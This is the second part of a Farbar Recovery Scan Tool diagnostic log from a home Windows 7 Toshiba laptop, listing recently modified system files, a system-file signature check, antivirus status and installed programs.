2014-10-19 15:45 - 2014-09-20 00:15 - 00451584 _____ (Microsoft Corporation) C:\windows\system32\dxtmsft.dll

2014-10-19 15:45 - 2014-09-20 00:15 - 00281600 _____ (Microsoft Corporation) C:\windows\system32\dxtrans.dll

2014-10-19 15:45 - 2014-09-19 22:57 - 14368768 _____ (Microsoft Corporation) C:\windows\SysWOW64\mshtml.dll

2014-10-19 15:45 - 2014-09-19 22:57 - 13757952 _____ (Microsoft Corporation) C:\windows\SysWOW64\ieframe.dll

2014-10-19 15:45 - 2014-09-19 22:57 - 02861568 _____ (Microsoft Corporation) C:\windows\SysWOW64\jscript9.dll

2014-10-19 15:45 - 2014-09-19 22:57 - 02055168 _____ (Microsoft Corporation) C:\windows\SysWOW64\iertutil.dll

2014-10-19 15:45 - 2014-09-19 22:57 - 01762816 _____ (Microsoft Corporation) C:\windows\SysWOW64\wininet.dll

2014-10-19 15:45 - 2014-09-19 22:57 - 01180672 _____ (Microsoft Corporation) C:\windows\SysWOW64\urlmon.dll

2014-10-19 15:45 - 2014-09-19 22:57 - 00690688 _____ (Microsoft Corporation) C:\windows\SysWOW64\jscript.dll

2014-10-19 15:45 - 2014-09-19 22:57 - 00493056 _____ (Microsoft Corporation) C:\windows\SysWOW64\msfeeds.dll

2014-10-19 15:45 - 2014-09-19 22:57 - 00391168 _____ (Microsoft Corporation) C:\windows\SysWOW64\ieui.dll

2014-10-19 15:45 - 2014-09-19 22:57 - 00226816 _____ (Microsoft Corporation) C:\windows\SysWOW64\iedkcs32.dll

2014-10-19 15:45 - 2014-09-19 22:57 - 00163840 _____ (Microsoft Corporation) C:\windows\SysWOW64\msrating.dll

2014-10-19 15:45 - 2014-09-19 22:57 - 00109056 _____ (Microsoft Corporation) C:\windows\SysWOW64\iesysprep.dll

2014-10-19 15:45 - 2014-09-19 22:57 - 00080384 _____ (Microsoft Corporation) C:\windows\SysWOW64\mshtmled.dll

2014-10-19 15:45 - 2014-09-19 22:57 - 00061440 _____ (Microsoft Corporation) C:\windows\SysWOW64\iesetup.dll

2014-10-19 15:45 - 2014-09-19 22:57 - 00039936 _____ (Microsoft Corporation) C:\windows\SysWOW64\jsproxy.dll

2014-10-19 15:45 - 2014-09-19 22:57 - 00033280 _____ (Microsoft Corporation) C:\windows\SysWOW64\iernonce.dll

2014-10-19 15:45 - 2014-09-19 22:56 - 01440768 _____ (Microsoft Corporation) C:\windows\SysWOW64\inetcpl.cpl

2014-10-19 15:45 - 2014-09-19 22:56 - 00357888 _____ (Microsoft Corporation) C:\windows\SysWOW64\dxtmsft.dll

2014-10-19 15:45 - 2014-09-19 22:56 - 00226816 _____ (Microsoft Corporation) C:\windows\SysWOW64\dxtrans.dll

2014-10-19 15:45 - 2014-09-19 22:38 - 02706432 _____ (Microsoft Corporation) C:\windows\system32\mshtml.tlb

2014-10-19 15:45 - 2014-09-19 22:33 - 02706432 _____ (Microsoft Corporation) C:\windows\SysWOW64\mshtml.tlb

2014-10-19 15:45 - 2014-09-19 21:43 - 00089600 _____ (Microsoft Corporation) C:\windows\system32\RegisterIEPKEYs.exe

2014-10-19 15:45 - 2014-09-19 21:35 - 00071680 _____ (Microsoft Corporation) C:\windows\SysWOW64\RegisterIEPKEYs.exe

2014-10-19 15:45 - 2014-09-12 20:58 - 00077312 _____ (Microsoft Corporation) C:\windows\system32\packager.dll

2014-10-19 15:45 - 2014-09-12 20:40 - 00067072 _____ (Microsoft Corporation) C:\windows\SysWOW64\packager.dll

2014-10-17 12:57 - 2014-10-17 12:58 - 127289600 _____ (Microsoft Corporation) C:\Users\Heathman\Downloads\msert (1).exe

==================== One Month Modified Files and Folders =======

(If an entry is included in the fixlist, the file\folder will be moved.)

2014-10-29 09:05 - 2012-03-24 16:17 - 00000898 _____ () C:\windows\Tasks\GoogleUpdateTaskMachineUA.job

2014-10-29 08:24 - 2012-04-01 20:34 - 00000830 _____ () C:\windows\Tasks\Adobe Flash Player Updater.job

2014-10-29 08:23 - 2012-10-11 20:07 - 00000920 _____ () C:\windows\Tasks\GoogleUpdateTaskUserS-1-5-21-616022151-183045692-1389677156-1002UA.job

2014-10-29 08:08 - 2014-05-17 20:38 - 00129752 _____ (Malwarebytes Corporation) C:\windows\system32\Drivers\MBAMSwissArmy.sys

2014-10-29 07:43 - 2009-07-13 22:20 - 00000000 __RHD () C:\Users\Default

2014-10-29 07:38 - 2012-03-24 16:01 - 01389919 _____ () C:\windows\WindowsUpdate.log

2014-10-29 07:24 - 2009-07-13 21:34 - 00000215 _____ () C:\windows\system.ini

2014-10-29 07:18 - 2014-05-17 17:12 - 00000000 ____D () C:\Program Files (x86)\Malwarebytes Anti-Malware

2014-10-29 06:23 - 2012-10-11 20:07 - 00000868 _____ () C:\windows\Tasks\GoogleUpdateTaskUserS-1-5-21-616022151-183045692-1389677156-1002Core.job

2014-10-28 22:39 - 2012-10-13 15:28 - 00000000 ____D () C:\Users\Heathman\AppData\Roaming\MotoCast

2014-10-28 22:38 - 2012-11-01 06:39 - 00000000 ____D () C:\Users\Heathman\.gstreamer-0.10

2014-10-28 22:27 - 2013-10-21 09:40 - 00003950 _____ () C:\windows\System32\Tasks\User_Feed_Synchronization-{33596801-E64F-4DCE-B487-9E9DBE9DB15C}

2014-10-28 22:03 - 2009-07-14 00:13 - 00006214 _____ () C:\windows\system32\PerfStringBackup.INI

2014-10-28 21:20 - 2012-10-13 15:30 - 00000000 ____D () C:\Temp

2014-10-28 21:12 - 2009-07-13 23:45 - 00025120 ____H () C:\windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0

2014-10-28 21:12 - 2009-07-13 23:45 - 00025120 ____H () C:\windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0

2014-10-28 21:04 - 2009-07-14 00:08 - 00000006 ____H () C:\windows\Tasks\SA.DAT

2014-10-28 21:04 - 2009-07-13 23:51 - 00072697 _____ () C:\windows\setupact.log

2014-10-28 20:52 - 2010-11-20 22:47 - 03730694 _____ () C:\windows\PFRO.log

2014-10-27 18:16 - 2014-09-03 19:53 - 00000000 ____D () C:\Program Files (x86)\iTunes

2014-10-25 14:00 - 2012-03-24 16:17 - 00003894 _____ () C:\windows\System32\Tasks\GoogleUpdateTaskMachineUA

2014-10-25 14:00 - 2012-03-24 16:17 - 00003642 _____ () C:\windows\System32\Tasks\GoogleUpdateTaskMachineCore

2014-10-25 14:00 - 2012-03-24 16:17 - 00000894 _____ () C:\windows\Tasks\GoogleUpdateTaskMachineCore.job

2014-10-24 18:27 - 2012-08-11 10:41 - 00000000 ____D () C:\Users\Heathman\AppData\Local\CrashDumps

2014-10-24 18:19 - 2012-11-06 22:39 - 00000000 ____D () C:\Users\Heathman\Documents\My Kindle Content

2014-10-22 06:18 - 2012-10-11 20:07 - 00003896 _____ () C:\windows\System32\Tasks\GoogleUpdateTaskUserS-1-5-21-616022151-183045692-1389677156-1002UA

2014-10-22 06:18 - 2012-10-11 20:07 - 00003500 _____ () C:\windows\System32\Tasks\GoogleUpdateTaskUserS-1-5-21-616022151-183045692-1389677156-1002Core

2014-10-21 11:15 - 2009-07-13 22:20 - 00000000 ____D () C:\windows\rescache

2014-10-21 10:22 - 2009-07-13 22:20 - 00000000 ____D () C:\windows\system32\NDF

2014-10-20 19:34 - 2014-05-17 17:13 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware

2014-10-20 19:34 - 2013-07-29 17:47 - 00001113 _____ () C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk

2014-10-19 16:58 - 2009-07-13 23:45 - 00434912 _____ () C:\windows\system32\FNTCACHE.DAT

2014-10-19 16:56 - 2014-05-06 06:24 - 00000000 ___SD () C:\windows\system32\CompatTel

2014-10-19 16:54 - 2012-03-24 14:10 - 00000000 ____D () C:\ProgramData\Microsoft Help

2014-10-19 16:48 - 2013-07-21 08:54 - 00000000 ____D () C:\windows\system32\MRT

2014-10-19 16:44 - 2012-03-28 19:04 - 103265616 _____ (Microsoft Corporation) C:\windows\system32\MRT.exe

2014-10-19 16:08 - 2013-07-23 18:36 - 00000000 ____D () C:\Users\Heathman\Desktop\Norton

2014-10-19 16:08 - 2012-03-24 16:16 - 00000000 ____D () C:\ProgramData\Norton

2014-10-19 16:08 - 2012-03-24 12:56 - 00000000 ____D () C:\Users\Heathman\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Norton

2014-10-19 16:00 - 2014-06-17 20:27 - 00003206 _____ () C:\windows\System32\Tasks\Norton WSC Integration

2014-10-19 16:00 - 2014-06-17 20:27 - 00000000 ____D () C:\Program Files\Common Files\Symantec Shared

2014-10-19 15:57 - 2014-06-17 20:14 - 00038912 ___SH () C:\Users\Heathman\Desktop\Thumbs.db

2014-10-19 15:56 - 2012-03-24 12:56 - 00000000 ____D () C:\Users\Public\Downloads\Norton

2014-10-19 15:48 - 2013-12-18 07:40 - 00000000 ____D () C:\Users\ADH.Heathman-PC\AppData\Local\CrashDumps

2014-10-19 15:44 - 2013-12-18 07:38 - 00000000 ____D () C:\Users\ADH.Heathman-PC

2014-10-19 15:39 - 2012-03-25 20:16 - 00002030 _____ () C:\Users\Public\Desktop\Adobe Reader X.lnk

2014-10-19 15:39 - 2011-11-21 23:32 - 00002441 _____ () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Reader X.lnk

2014-10-19 15:38 - 2012-05-16 00:06 - 00000000 ____D () C:\Users\UpdatusUser.Heathman-PC

2014-10-19 15:36 - 2012-03-24 12:43 - 00000000 ____D () C:\Users\Heathman

2014-10-19 15:33 - 2014-09-03 19:54 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\iTunes

2014-10-19 15:33 - 2014-06-17 20:25 - 00000000 ____D () C:\windows\system32\Drivers\N360x64

2014-10-19 15:33 - 2012-04-01 19:39 - 00000000 ____D () C:\Users\Guest

2014-10-19 15:33 - 2012-03-24 16:17 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome

2014-10-19 15:33 - 2011-11-21 23:31 - 00000000 ____D () C:\windows\SysWOW64\Macromed

2014-10-19 15:33 - 2009-07-13 22:20 - 00000000 ___RD () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories

2014-10-19 15:33 - 2009-07-13 22:20 - 00000000 ____D () C:\windows\SysWOW64\Dism

2014-10-19 15:33 - 2009-07-13 22:20 - 00000000 ____D () C:\windows\system32\Dism

2014-10-19 15:33 - 2009-07-13 22:20 - 00000000 ____D () C:\windows\PolicyDefinitions

2014-10-19 15:33 - 2009-07-13 22:20 - 00000000 ____D () C:\windows\AppCompat

2014-10-19 15:33 - 2009-07-13 22:20 - 00000000 ____D () C:\Program Files\Common Files\Microsoft Shared

2014-10-19 15:20 - 2009-07-13 22:20 - 00000000 ____D () C:\windows\registration

2014-10-19 15:16 - 2012-06-27 20:07 - 00000000 ____D () C:\Users\Heathman\Documents\TomTom

2014-10-19 14:56 - 2012-03-25 20:11 - 00000000 ____D () C:\Users\Heathman\AppData\Local\Adobe

2014-10-03 06:45 - 2014-02-18 21:09 - 00000000 ____D () C:\Users\ADH.Heathman-PC\AppData\Local\Adobe

2014-10-01 11:11 - 2014-05-17 17:12 - 00093400 _____ (Malwarebytes Corporation) C:\windows\system32\Drivers\mbamchameleon.sys

2014-10-01 11:11 - 2014-05-17 17:12 - 00063704 _____ (Malwarebytes Corporation) C:\windows\system32\Drivers\mwac.sys

2014-10-01 11:11 - 2013-07-29 17:47 - 00025816 _____ (Malwarebytes Corporation) C:\windows\system32\Drivers\mbam.sys

==================== Bamital & volsnap Check =================

(There is no automatic fix for files that do not pass verification.)

C:\Windows\System32\winlogon.exe => File is digitally signed

C:\Windows\System32\wininit.exe => File is digitally signed

C:\Windows\SysWOW64\wininit.exe => File is digitally signed

C:\Windows\explorer.exe => File is digitally signed

C:\Windows\SysWOW64\explorer.exe => File is digitally signed

C:\Windows\System32\svchost.exe => File is digitally signed

C:\Windows\SysWOW64\svchost.exe => File is digitally signed

C:\Windows\System32\services.exe => File is digitally signed

C:\Windows\System32\User32.dll => File is digitally signed

C:\Windows\SysWOW64\User32.dll => File is digitally signed

C:\Windows\System32\userinit.exe => File is digitally signed

C:\Windows\SysWOW64\userinit.exe => File is digitally signed

C:\Windows\System32\rpcss.dll => File is digitally signed

C:\Windows\System32\Drivers\volsnap.sys => File is digitally signed

LastRegBack: 2014-10-28 21:55

==================== End Of Log ============================

Addition

Additional scan result of Farbar Recovery Scan Tool (x64) Version: 29-10-2014

Ran by ADH at 2014-10-29 09:20:59

Running from C:\Users\ADH.Heathman-PC\Desktop\FRST64

Boot Mode: Normal

==========================================================

==================== Security Center ========================

(If an entry is included in the fixlist, it will be removed.)

AV: Norton 360 Premier Edition (Enabled - Up to date) {D87FA2C0-F526-77B1-D6EC-0EDF3936CEDB}

AS: Norton 360 Premier Edition (Enabled - Up to date) {631E4324-D31C-783F-EC5C-35AD42B18466}

AS: Windows Defender (Disabled - Out of date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

FW: Norton 360 Premier Edition (Enabled) {E04423E5-BF49-76E9-FDB3-A7EAC7E589A0}

==================== Installed Programs ======================

(Only the adware programs with "hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

Adobe AIR (HKLM-x32\...\Adobe AIR) (Version: 2.6.0.19140 - Adobe Systems Incorporated)

Adobe Flash Player 15 ActiveX (HKLM-x32\...\Adobe Flash Player ActiveX) (Version: 15.0.0.167 - Adobe Systems Incorporated)

Adobe Flash Player 15 Plugin (HKLM-x32\...\Adobe Flash Player Plugin) (Version: 15.0.0.152 - Adobe Systems Incorporated)

Adobe Reader X (10.1.12) MUI (HKLM-x32\...\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}) (Version: 10.1.12 - Adobe Systems Incorporated)

Amazing Adventures The Forgotten Dynasty (HKLM-x32\...\Amazing Adventures The Forgotten Dynasty) (Version: - PopCap Games)

Amazon Links (HKLM-x32\...\{3135D885-9D9A-4B4D-8D45-9DB05DA115CA}) (Version: 2.02 - TOSHIBA Corporation)

Amazon MP3 Downloader 1.0.17 (HKLM-x32\...\Amazon MP3 Downloader) (Version: 1.0.17 - Amazon Services LLC)

Apple Application Support (HKLM-x32\...\{78002155-F025-4070-85B3-7C0453561701}) (Version: 3.0.6 - Apple Inc.)

Apple Mobile Device Support (HKLM\...\{6AF2AC2A-3532-43FD-9F4D-BDC9C0D724C7}) (Version: 7.1.2.6 - Apple Inc.)

Apple Software Update (HKLM-x32\...\{789A5B64-9DD9-4BA5-915A-F0FC0A1B7BFE}) (Version: 2.1.3.127 - Apple Inc.)

Bejeweled 3 (x32 Version: 2.2.0.97 - WildTangent) Hidden

Big City Adventure San Francisco (HKLM-x32\...\Big City Adventure San Francisco_is1) (Version: - Best Buy)

Big City Adventure Sydney (HKLM-x32\...\Big City Adventure Sydney_is1) (Version: - Best Buy)

Bonjour (HKLM\...\{6E3610B2-430D-4EB0-81E3-2B57E8B9DE8D}) (Version: 3.0.0.10 - Apple Inc.)

Castle - Never Judge a Book by Its Cover (HKLM-x32\...\Castle - Never Judge a Book by Its Cover) (Version: 1.0 - GameMill Entertainment)

ContentHD (x32 Version: 1.00.0002 - Corel Corporation) Hidden

Contents (x32 Version: 1.5.10.332 - Corel Corporation) Hidden

Corel Digital Studio SE (HKLM-x32\...\_{E185BD5C-0E10-479F-AF44-63D3A068446A}) (Version: 1.5.10.332 - Corel Corporation)

D3DX10 (x32 Version: 15.4.2368.0902 - Microsoft) Hidden

DeviceIO (x32 Version: 1.5.10.332 - Corel Corporation) Hidden

DFPro (x32 Version: 1.5.10.332 - Corel Corporation) Hidden

Escape The Emerald Star (HKLM-x32\...\Escape The Emerald Star) (Version: - PopCap Games)

Escape Whisper Valley (HKLM-x32\...\Escape Whisper Valley) (Version: - PopCap Games)

FATE - The Traitor Soul (x32 Version: 2.2.0.95 - WildTangent) Hidden

Google Chrome (HKLM-x32\...\Google Chrome) (Version: 38.0.2125.104 - Google Inc.)

Google Earth Plug-in (HKLM-x32\...\{4AB54F11-2F8C-11E3-B09F-B8AC6F97B88E}) (Version: 7.1.2.2041 - Google)

Google Toolbar for Internet Explorer (HKLM-x32\...\{2318C2B1-4965-11d4-9B18-009027A5CD4F}) (Version: 7.5.5111.1712 - Google Inc.)

Google Toolbar for Internet Explorer (x32 Version: 1.0.0 - Google Inc.) Hidden

Google Update Helper (x32 Version: 1.3.25.5 - Google Inc.) Hidden

Hoyle Card Games Classic (HKLM-x32\...\Hoyle Card Games Classic) (Version: - )

Hoyle Casino Classic (HKLM-x32\...\Hoyle Casino Classic) (Version: - )

ICA (x32 Version: 1.5.10.332 - Corel Corporation) Hidden

Intel® Management Engine Components (HKLM-x32\...\{65153EA5-8B6E-43B6-857B-C6E4FC25798A}) (Version: 7.0.0.1144 - Intel Corporation)

Intel® Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 8.15.10.2430 - Intel Corporation)

Intel® PROSet/Wireless WiFi Software (HKLM\...\{3C41721F-AF0F-4086-AA1C-4C7F29076228}) (Version: 14.01.1000 - Intel Corporation)

Intel® Rapid Storage Technology (HKLM-x32\...\{3E29EE6C-963A-4aae-86C1-DC237C4A49FC}) (Version: 10.1.2.1004 - Intel Corporation)

Intel® WiDi (HKLM-x32\...\{7257132D-7F65-41E6-A90F-43BF6099461A}) (Version: 2.1.42.0 - Intel Corporation)

Intel® Wireless Display (HKLM\...\{28EF7372-9087-4AC3-9B9F-D9751FCDF830}) (Version: - )

IPM_OEM (x32 Version: 1.53 - Corel Corporation) Hidden

ISCOM (x32 Version: 1.5.10.332 - Corel Corporation) Hidden

iTunes (HKLM\...\{77DE5105-D05E-448C-96CB-7FA381903753}) (Version: 11.3.1.2 - Apple Inc.)

Java 6 Update 25 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F83216025FF}) (Version: 6.0.250 - Oracle)

Jewel Quest Mysteries Curse of the Emerald Tear (HKLM-x32\...\{246BBF3E-3CB6-4269-9728-904C54CC1D4A}) (Version: 1.00.0000 - Valusoft)

Jewel Quest Mysteries The Seventh Gate (HKLM-x32\...\{BD40253B-EFE2-4610-9AA5-F3317DB970BE}) (Version: 1.00.0000 - Valusoft)

Jewel Quest Mysteries Trail of the Midnight Heart (HKLM-x32\...\{305706E3-A7FC-466F-8594-AD4522951418}) (Version: 1.00.0000 - Valusoft)

JMicron Flash Media Controller Driver (HKLM-x32\...\{26604C7E-A313-4D12-867F-7C6E7820BE4C}) (Version: 1.0.57.2 - JMicron Technology Corp.)

Junk Mail filter update (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden

Label@Once 1.0 (x32 Version: 1.0 - Corel) Hidden

Letters from Nowhere 2 (x32 Version: 2.2.0.97 - WildTangent) Hidden

Malwarebytes Anti-Malware version 2.0.3.1025 (HKLM-x32\...\Malwarebytes Anti-Malware_is1) (Version: 2.0.3.1025 - Malwarebytes Corporation)

Mesh Runtime (x32 Version: 15.4.5722.2 - Microsoft Corporation) Hidden

Microsoft .NET Framework 4.5.1 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.5.50938 - Microsoft Corporation)

Microsoft Office Professional 2010 (HKLM-x32\...\Office14.SingleImage) (Version: 14.0.7015.1000 - Microsoft Corporation)

Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.30514.0 - Microsoft Corporation)

Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM-x32\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation)

Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)

Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{837b34e3-7c30-493c-8f6a-2b0f04e2912c}) (Version: 8.0.59193 - Microsoft Corporation)

Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{071c9b48-7c32-4621-a0ac-3f809523288f}) (Version: 8.0.56336 - Microsoft Corporation)

Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{6E8E85E8-CE4B-4FF5-91F7-04999C9FAE6A}) (Version: 8.0.50727.42 - Microsoft Corporation)

Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation)

Microsoft Visual C++ 2008 Redistributable - x64 9.0.21022 (HKLM\...\{350AA351-21FA-3270-8B7A-835434E766AD}) (Version: 9.0.21022 - Microsoft Corporation)

Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)

Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.4148 (HKLM\...\{4B6C7001-C7D6-3710-913E-5BC23FCE91E6}) (Version: 9.0.30729.4148 - Microsoft Corporation)

Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)

Microsoft Visual C++ 2008 Redistributable - x86 9.0.21022 (HKLM-x32\...\{FF66E9F6-83E7-3A3E-AF14-8DE9A809A6A4}) (Version: 9.0.21022 - Microsoft Corporation)

Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)

Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)

Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)

Microsoft Visual C++ 2010 x86 Redistributable - 10.0.30319 (HKLM-x32\...\{196BB40D-1578-3D01-B289-BEFC77A11A1E}) (Version: 10.0.30319 - Microsoft Corporation)

MLE (x32 Version: 1.0.0.60 - Corel Corporation) Hidden

MotoCast (HKLM-x32\...\{5401CEE8-3C2D-4835-A802-213306537FF4}) (Version: 2.0.31 - Motorola Mobility)

Motorola Device Manager (HKLM-x32\...\{28DB8373-C1BB-444F-A427-A55585A12ED7}) (Version: 2.4.5 - Motorola Mobility)

Motorola Device Software Update (x32 Version: 13.09.3001 - Motorola Mobility) Hidden

MOTOROLA MEDIA LINK (x32 Version: 1.9.0002.0 - Motorola) Hidden

Motorola Mobile Drivers Installation 6.3.0 (HKLM\...\{759E6A2F-1F01-45EF-A0C4-22F1B56CB975}) (Version: 6.3.0 - Motorola Mobility LLC)

MSXML 4.0 SP2 (KB954430) (HKLM-x32\...\{86493ADD-824D-4B8E-BD72-8C5DCDC52A71}) (Version: 4.20.9870.0 - Microsoft Corporation)

MSXML 4.0 SP2 (KB973688) (HKLM-x32\...\{F662A8E6-F4DC-41A2-901E-8C11F044BDEC}) (Version: 4.20.9876.0 - Microsoft Corporation)

MSXML 4.0 SP3 Parser (HKLM-x32\...\{196467F1-C11F-4F76-858B-5812ADC83B94}) (Version: 4.30.2100.0 - Microsoft Corporation)

MSXML 4.0 SP3 Parser (KB2721691) (HKLM-x32\...\{355B5AC0-CEEE-42C5-AD4D-7F3CFD806C36}) (Version: 4.30.2114.0 - Microsoft Corporation)

MSXML 4.0 SP3 Parser (KB2758694) (HKLM-x32\...\{1D95BA90-F4F8-47EC-A882-441C99D30C1E}) (Version: 4.30.2117.0 - Microsoft Corporation)

Mystery P.I. - Stolen in San Francisco (HKLM-x32\...\Mystery P.I. - Stolen in San Francisco) (Version: - PopCap Games)

Mystery P.I. - The New York Fortune (HKLM-x32\...\Mystery P.I. - The New York Fortune) (Version: - PopCap Games)

National Geographic Collector's Pack (HKLM-x32\...\{3BF564F2-7434-454A-88DD-9A6114851751}) (Version: 1.00.0000 - Valusoft)

Norton 360 (HKLM-x32\...\N360) (Version: 21.6.0.32 - Symantec Corporation)

Norton PC Checkup (HKLM-x32\...\Norton PC Checkup_is1) (Version: 3.0.2.90.0 - NortonLive Services)

NVIDIA 3D Vision Controller Driver 296.10 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.NVIRUSB) (Version: 296.10 - NVIDIA Corporation)

NVIDIA Graphics Driver 296.10 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Driver) (Version: 296.10 - NVIDIA Corporation)

NVIDIA PhysX System Software 9.12.0213 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.PhysX) (Version: 9.12.0213 - NVIDIA Corporation)

PCmover Professional (HKLM-x32\...\{71AA2137-C3F3-45C6-A408-81697FE5A3B8}) (Version: 6.00.620.0 - Laplink Software, Inc.)

Penguins! (x32 Version: 2.2.0.98 - WildTangent) Hidden

Plants vs. Zombies - Game of the Year (x32 Version: 2.2.0.98 - WildTangent) Hidden

PlayReady PC Runtime amd64 (HKLM\...\{BCA9334F-B6C9-4F65-9A73-AC5A329A4D04}) (Version: 1.3.0 - Microsoft Corporation)

PlayReady PC Runtime x86 (HKLM-x32\...\{CCA5EAAD-92F4-4B7A-B5EE-14294C66AB61}) (Version: 1.3.0 - Microsoft Corporation)

Polar Bowler (x32 Version: 2.2.0.97 - WildTangent) Hidden

PureHD (x32 Version: 1.5.10.332 - Corel Corporation) Hidden

Realtek Ethernet Controller Driver (HKLM-x32\...\{8833FFB6-5B0C-4764-81AA-06DFEED9A476}) (Version: 7.38.113.2011 - Realtek)

Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.6305 - Realtek Semiconductor Corp.)

Renesas Electronics USB 3.0 Host Controller Driver (HKLM-x32\...\InstallShield_{5442DAB8-7177-49E1-8B22-09A049EA5996}) (Version: 2.0.34.0 - Renesas Electronics Corporation)

Renesas Electronics USB 3.0 Host Controller Driver (x32 Version: 2.0.34.0 - Renesas Electronics Corporation) Hidden

RollerCoaster Tycoon 3: Platinum (x32 Version: 2.2.0.98 - WildTangent) Hidden

Samsung CLP-310 Series (HKLM-x32\...\Samsung CLP-310 Series) (Version: - Samsung Electronics CO.,LTD)

Service Pack 2 for Microsoft Office 2010 (KB2687455) 32-Bit Edition (HKLM-x32\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{DE28B448-32E8-4E8F-84F0-A52B21A49B5B}) (Version: - Microsoft)

Setup (x32 Version: 1.5.10.332 - Corel Corporation) Hidden

Share (x32 Version: 1.5.10.332 - Corel Corporation) Hidden

Share64 (Version: 1.5.10.332 - Corel Corporation) Hidden

Skype Launcher (HKLM-x32\...\{DA84ECBF-4B79-47F2-B34C-95C38484C058}) (Version: 2.01 - TOSHIBA Corporation)

Synaptics Pointing Device Driver (HKLM\...\SynTPDeinstKey) (Version: 15.2.11.1 - Synaptics Incorporated)

Tales of Lagoona (x32 Version: 2.2.0.98 - WildTangent) Hidden

TomTom HOME (HKLM-x32\...\{26CE484D-2E8E-40D5-B251-158133114C69}) (Version: 2.9.0 - TomTom)

TomTom HOME Visual Studio Merge Modules (HKLM-x32\...\{8F3C31C5-9C3A-4AA8-8EFA-71290A7AD533}) (Version: 1.0.2 - TomTom International B.V.)

Toshiba App Place (HKLM-x32\...\{ED3CBA78-488F-4E8C-B33F-8E3BF4DDB4D2}) (Version: 1.0.6.3 - Toshiba)

TOSHIBA Application Installer (HKLM-x32\...\{970472D0-F5F9-4158-A6E3-1AE49EFEF2D3}) (Version: 9.0.1.2 - TOSHIBA)

TOSHIBA Assist (HKLM-x32\...\{C2A276E3-154E-44DC-AAF1-FFDD7FD30E35}) (Version: 4.2.3.0 - TOSHIBA CORPORATION)

TOSHIBA Blu-ray Disc Player (HKLM\...\{27C3DB42-A9C1-4B44-A164-93849D160D12}) (Version: 1.0.3.188 - Toshiba Corporation)

Toshiba Book Place (HKLM-x32\...\{C31337DE-0CDC-45A9-9A32-F099AC78D557}) (Version: 3.0.9490 - K-NFB Reading Technology, Inc.)

TOSHIBA Bulletin Board (HKLM-x32\...\InstallShield_{1C8C049A-145F-4A6E-8290-B5C245EBE39D}) (Version: 1.6.11.64 - TOSHIBA Corporation)

TOSHIBA Disc Creator (HKLM\...\{5DA0E02F-970B-424B-BF41-513A5018E4C0}) (Version: 2.1.0.11 for x64 - TOSHIBA Corporation)

TOSHIBA eco Utility (HKLM\...\{C2F94B5E-201A-4754-8F2F-4395E1D90DA3}) (Version: 1.3.5.64 - TOSHIBA Corporation)

TOSHIBA Face Recognition (HKLM-x32\...\InstallShield_{F67FA545-D8E5-4209-86B1-AEE045D1003F}) (Version: 3.1.17.64 - TOSHIBA Corporation)

TOSHIBA Flash Cards Support Utility (HKLM-x32\...\InstallShield_{620BBA5E-F848-4D56-8BDA-584E44584C5E}) (Version: 1.63.0.12C - TOSHIBA CORPORATION)

TOSHIBA Hardware Setup (HKLM-x32\...\InstallShield_{5279374D-87FE-4879-9385-F17278EBB9D3}) (Version: 1.63.1.37C - TOSHIBA CORPORATION)

TOSHIBA HDD Protection (HKLM\...\{94A90C69-71C1-470A-88F5-AA47ECC96B40}) (Version: 2.2.2.15 - TOSHIBA Corporation)

